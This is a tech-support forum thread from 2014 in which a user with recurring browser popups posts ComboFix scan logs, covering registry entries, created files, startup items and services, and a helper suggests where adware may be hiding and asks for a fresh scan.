[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_13_0_0_214_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_13_0_0_214_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.13"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_13_0_0_214.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Nico Mak Computing\WinZip]
"SymbolicLinkValue"=hex(6):5c,00,52,00,65,00,67,00,69,00,73,00,74,00,72,00,79,
00,5c,00,4d,00,41,00,43,00,48,00,49,00,4e,00,45,00,5c,00,53,00,6f,00,66,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-05-27 13:04:28
ComboFix-quarantined-files.txt 2014-05-27 05:04
.
Pre-Run: 12,793,180,160 bytes free
Post-Run: 12,680,060,928 bytes free
.
- - End Of File - - E5C51C2CE585BD0D7E13778363C13DBE


----------



## raphael100 (May 24, 2014)

Strange - this did not appear anywhere in my Start - Search File and Programs. I noticed it on C:


----------



## emeraldnzl (Nov 3, 2007)

> I have been observing this for a few days now. The winning combination to get the popups to start appearing is power cable attached AND IE open. They will then continue to appear even after IE is closed (upon exit my CCleaner automatically cleans IE). The popups disappear if I detach the power cable. Then they do not reappear until I plug the cable in again.


Yes, I think that rather confirms what I suspect. Probably it's hiding in your browser preferences or it might even be in Java or Flash and when CCleaner clears browser cache it disappears. Then when you restart IE or for that matter your other browsers they check with user preferences and the pop up re-appears.

I will check your ComboFix log and get back to you.


----------



## raphael100 (May 24, 2014)

The Previous ComboFix Quarantine File


2014-05-27 05:02:55 . 2014-05-27 05:02:55 80 ----a-w- C:\Qoobox\Quarantine\Registry_backups\HKLM-Run-SynTPEnh.reg.dat
2014-05-27 05:01:40 . 2014-05-27 05:01:40 229 ----a-w- C:\Qoobox\Quarantine\Registry_backups\HKLM_Wow6432Node-ActiveSetup-{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}.reg.dat
2014-05-27 05:01:35 . 2014-05-27 05:01:35 377 ----a-w- C:\Qoobox\Quarantine\Registry_backups\HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47}.reg.dat
2014-05-27 04:59:54 . 2014-05-27 04:59:54 124 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Wow6432Node-Toolbar-{665cb5b7-4c3b-4995-8cec-1f4d5860edc9}.reg.dat
2014-05-27 04:59:53 . 2014-05-27 04:59:53 175 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Wow6432Node-BHO-{cc28794a-99d4-4b1b-bccf-b065ce5f9feb}.reg.dat
2014-05-27 04:59:53 . 2014-05-27 04:59:53 175 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Wow6432Node-BHO-{9e28b297-11d4-4293-aa6f-558658ee66ae}.reg.dat
2014-05-27 04:41:11 . 2014-05-27 04:41:11 17,971 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg
2014-05-27 04:37:14 . 2014-05-27 04:37:14 51 ----a-w- C:\Qoobox\Quarantine\catchme.log


----------



## raphael100 (May 24, 2014)

It seems the popups happen even after CClean does its exit clean. However I am keeping this dialogue open in Chrome - which is also set to Google. Maybe hiding in the search engine? The power cable thing is still evident - could that be something to do with power settings software. (I have just reset power settings to HP Factory. But popups still there).


----------



## raphael100 (May 24, 2014)

Please note the files are from the previous ComboFix. Shall I delete files re-download and try again as you suggest?


----------



## emeraldnzl (Nov 3, 2007)

Thank you. 

*Edit:*

I have to go out now so won't be here when you post back.

I will check in again when I return.


----------



## raphael100 (May 24, 2014)

Thanks For Your Time!


----------



## emeraldnzl (Nov 3, 2007)

> Shall I delete files re-download and try again as you suggest?


Yes please.


----------



## raphael100 (May 24, 2014)

ComboFix 14-06-04.01 - Hewlett Packard 06/06/2014 11:07:14.2.4 - x64
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.63.1033.18.4041.1147 [GMT 8:00]
Running from: c:\users\Hewlett Packard\Desktop\ComboFix.exe
AV: Norton Internet Security *Disabled/Updated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
FW: Norton Internet Security *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
SP: Norton Internet Security *Enabled/Updated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2014-05-06 to 2014-06-06 )))))))))))))))))))))))))))))))
.
.
2014-06-06 03:12 . 2014-06-06 03:12	--------	d-----w-	c:\users\hedev\AppData\Local\temp
2014-06-06 03:12 . 2014-06-06 03:12	--------	d-----w-	c:\users\Default\AppData\Local\temp
2014-06-02 16:04 . 2014-06-02 17:19	--------	d-----w-	c:\programdata\Yahoo!
2014-06-02 14:13 . 2014-06-02 14:13	--------	d-----w-	C:\zoek
2014-06-02 00:35 . 2014-06-04 01:11	122584	----a-w-	c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-06-02 00:35 . 2014-06-02 00:35	--------	d-----w-	c:\program files (x86)\Malwarebytes Anti-Malware
2014-06-02 00:35 . 2014-06-02 00:35	--------	d-----w-	c:\programdata\Malwarebytes
2014-06-02 00:35 . 2014-05-11 23:26	63704	----a-w-	c:\windows\system32\drivers\mwac.sys
2014-06-02 00:35 . 2014-05-11 23:26	91352	----a-w-	c:\windows\system32\drivers\mbamchameleon.sys
2014-06-02 00:35 . 2014-05-11 23:25	25816	----a-w-	c:\windows\system32\drivers\mbam.sys
2014-06-02 00:34 . 2014-06-02 00:34	--------	d-----w-	c:\users\Hewlett Packard\AppData\Local\Programs
2014-05-25 10:58 . 2014-04-02 03:18	144664	----a-w-	c:\windows\SysWow64\secman.dll
2014-05-25 10:46 . 2014-04-11 08:39	206080	----a-w-	c:\windows\system32\drivers\ssudmdm.sys
2014-05-25 10:46 . 2014-04-11 08:39	110336	----a-w-	c:\windows\system32\drivers\ssudbus.sys
2014-05-24 22:57 . 2010-08-30 00:34	536576	----a-w-	c:\windows\SysWow64\sqlite3.dll
2014-05-24 22:57 . 2014-06-04 01:02	--------	d-----w-	C:\AdwCleaner
2014-05-24 22:56 . 2014-06-04 11:20	--------	d-----w-	C:\FRST
2014-05-24 21:46 . 2014-05-27 01:29	--------	d-----w-	C:\NPE
2014-05-24 21:44 . 2014-05-27 01:31	--------	d-----w-	c:\users\Hewlett Packard\AppData\Local\NPE
2014-05-21 00:30 . 2014-05-21 00:30	--------	d-----w-	c:\users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-16 19:14 . 2014-05-06 04:40	23544320	----a-w-	c:\windows\system32\mshtml.dll
2014-05-16 19:14 . 2014-05-06 03:00	84992	----a-w-	c:\windows\system32\mshtmled.dll
2014-05-16 19:14 . 2014-05-06 04:17	2724864	----a-w-	c:\windows\system32\mshtml.tlb
2014-05-16 19:14 . 2014-05-06 03:07	2724864	----a-w-	c:\windows\SysWow64\mshtml.tlb
2014-05-16 01:57 . 2014-05-16 15:12	--------	d-----w-	c:\windows\system32\drivers\NISx64\1503000.00C
2014-05-09 07:35 . 2014-05-09 07:35	--------	d-----w-	c:\users\Hewlett Packard\AppData\Roaming\Oracle
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-05-26 16:17 . 2013-05-31 05:28	692400	----a-w-	c:\windows\SysWow64\FlashPlayerApp.exe
2014-05-26 16:17 . 2011-11-09 23:56	70832	----a-w-	c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-05-16 19:03 . 2013-05-08 03:23	93223848	----a-w-	c:\windows\system32\MRT.exe
2014-04-14 18:34 . 2014-04-14 18:34	1070232	----a-w-	c:\windows\SysWow64\MSCOMCTL.OCX
2014-04-14 12:13 . 2013-10-22 02:11	96168	----a-w-	c:\windows\SysWow64\WindowsAccessBridge-32.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00001YSISyncComplete]
@="{89B5F9CC-C4A2-462C-BD27-29CEAC972135}"
[HKEY_CLASSES_ROOT\CLSID\{89B5F9CC-C4A2-462C-BD27-29CEAC972135}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00002YSISyncActive]
@="{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}"
[HKEY_CLASSES_ROOT\CLSID\{84B7BDFB-C50A-4335-B7C2-8AEC454F9E25}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00003YSISyncError]
@="{306A9CDE-AC70-453A-8008-B5F9962B8F88}"
[HKEY_CLASSES_ROOT\CLSID\{306A9CDE-AC70-453A-8008-B5F9962B8F88}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00004YSILocalOnly]
@="{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}"
[HKEY_CLASSES_ROOT\CLSID\{23A7D2DC-F395-4E33-876C-84A2DFAB0EBB}]
2014-02-13 04:06	2852920	----a-w-	c:\program files (x86)\Hightail Desktop App\YSINSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54	131248	----a-w-	c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Monitoring"="c:\program files\CCleaner\CCleaner64.exe" [2014-05-20 6160152]
"Skype"="c:\program files (x86)\Skype\Phone\Skype.exe" [2014-02-10 20922016]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"Buffalo RUNONCE"="c:\buffalo\DriveNavi_HD-PUSU3-WR\%SRC_FILE1%" [X]
"Adobe ARM"="c:\program files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"HPOSD"="c:\program files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe" [2011-08-19 379960]
"HP CoolSense"="c:\program files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe" [2012-11-05 1343904]
"FLxHCIm64"="c:\program files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe" [2013-06-05 55536]
"HP Quick Launch"="c:\program files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe" [2012-03-05 578944]
"UIExec"="c:\program files (x86)\SMART BRO\UIExec.exe" [2012-05-11 156448]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2013-07-02 254336]
.
c:\users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-20 33322312]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2011-9-21 1338144]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
Notification Packages	REG_MULTI_SZ scecli c:\program files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 dg_ssudbus;SAMSUNG Mobile USB Composite Device Driver (DEVGURU Ver.);c:\windows\system32\DRIVERS\ssudbus.sys;c:\windows\SYSNATIVE\DRIVERS\ssudbus.sys [x]
R3 GamesAppService;GamesAppService;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe;c:\program files (x86)\WildTangent Games\App\GamesAppService.exe [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 massfilter;Mass Storage Filter Driver;c:\windows\system32\drivers\massfilter.sys;c:\windows\SYSNATIVE\drivers\massfilter.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RSPCIESTOR;Realtek PCIE CardReader Driver;c:\windows\system32\DRIVERS\RtsPStor.sys;c:\windows\SYSNATIVE\DRIVERS\RtsPStor.sys [x]
R3 SrvHsfHDA;SrvHsfHDA;c:\windows\system32\DRIVERS\VSTAZL6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTAZL6.SYS [x]
R3 SrvHsfV92;SrvHsfV92;c:\windows\system32\DRIVERS\VSTDPV6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTDPV6.SYS [x]
R3 SrvHsfWinac;SrvHsfWinac;c:\windows\system32\DRIVERS\VSTCNXT6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTCNXT6.SYS [x]
R3 ssudmdm;SAMSUNG Mobile USB Modem Drivers (DEVGURU Ver.);c:\windows\system32\DRIVERS\ssudmdm.sys;c:\windows\SYSNATIVE\DRIVERS\ssudmdm.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R3 WDC_SAM;WD SCSI Pass Thru driver;c:\windows\system32\DRIVERS\wdcsam64.sys;c:\windows\SYSNATIVE\DRIVERS\wdcsam64.sys [x]
R3 ZTEusbvoice;ZTE VoUSB Port;c:\windows\system32\DRIVERS\ZTEusbvoice.sys;c:\windows\SYSNATIVE\DRIVERS\ZTEusbvoice.sys [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S1 ccSet_MCLIENT;Norton Management Settings Manager;c:\windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [x]
S2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [x]
S2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 FPLService;TrueSuiteService;c:\program files (x86)\HP SimplePass 2012\TrueSuiteService.exe;c:\program files (x86)\HP SimplePass 2012\TrueSuiteService.exe [x]
S2 HP Support Assistant Service;HP Support Assistant Service;c:\program files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe;c:\program files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [x]
S2 HPClientSvc;HP Client Services;c:\program files\Hewlett-Packard\HP Client Services\HPClientServices.exe;c:\program files\Hewlett-Packard\HP Client Services\HPClientServices.exe [x]
S2 HPWMISVC;HPWMISVC;c:\program files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe;c:\program files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [x]
S2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;c:\program files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 IconMan_R;IconMan_R;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [x]
S2 irstrtsv;Intel(R) Rapid Start Technology Service;c:\windows\SysWOW64\irstrtsv.exe;c:\windows\SysWOW64\irstrtsv.exe [x]
S2 jhi_service;Intel(R) Identity Protection Technology Host Interface Service;c:\program files (x86)\Intel\Services\IPT\jhi_service.exe;c:\program files (x86)\Intel\Services\IPT\jhi_service.exe [x]
S2 MCLIENT;Norton Management;c:\program files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe;c:\program files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [x]
S2 NIS;Norton Internet Security;c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe;c:\program files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 UI Assistant Service;UI Assistant Service;c:\program files (x86)\SMART BRO\AssistantServices.exe;c:\program files (x86)\SMART BRO\AssistantServices.exe [x]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S3 bcbtums;Bluetooth RAM Firmware Download USB Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
S3 BHDrvx64;BHDrvx64;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [x]
S3 btwampfl;btwampfl Bluetooth filter driver;c:\windows\system32\drivers\btwampfl.sys;c:\windows\SYSNATIVE\drivers\btwampfl.sys [x]
S3 BTWDPAN;Bluetooth Personal Area Network;c:\windows\system32\DRIVERS\btwdpan.sys;c:\windows\SYSNATIVE\DRIVERS\btwdpan.sys [x]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
S3 ccSet_NIS;NIS Settings Manager;c:\windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys;c:\windows\SYSNATIVE\drivers\NISx64\1503000.00C\ccSetx64.sys [x]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys;c:\windows\SYSNATIVE\DRIVERS\clwvd.sys [x]
S3 EraserUtilRebootDrv;EraserUtilRebootDrv;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys;c:\program files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [x]
S3 FLxHCIc;Fresco Logic xHCI (USB3) Device Driver;c:\windows\system32\DRIVERS\FLxHCIc.sys;c:\windows\SYSNATIVE\DRIVERS\FLxHCIc.sys [x]
S3 FLxHCIh;Fresco Logic xHCI (USB3) Hub Device Driver;c:\windows\system32\DRIVERS\FLxHCIh.sys;c:\windows\SYSNATIVE\DRIVERS\FLxHCIh.sys [x]
S3 IDSVia64;IDSVia64;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140605.002\IDSvia64.sys;c:\program files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140605.002\IDSvia64.sys [x]
S3 IntcDAud;Intel(R) Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 irstrtdv;Intel(R) Rapid Start Technology Driver;c:\windows\system32\DRIVERS\irstrtdv.sys;c:\windows\SYSNATIVE\DRIVERS\irstrtdv.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
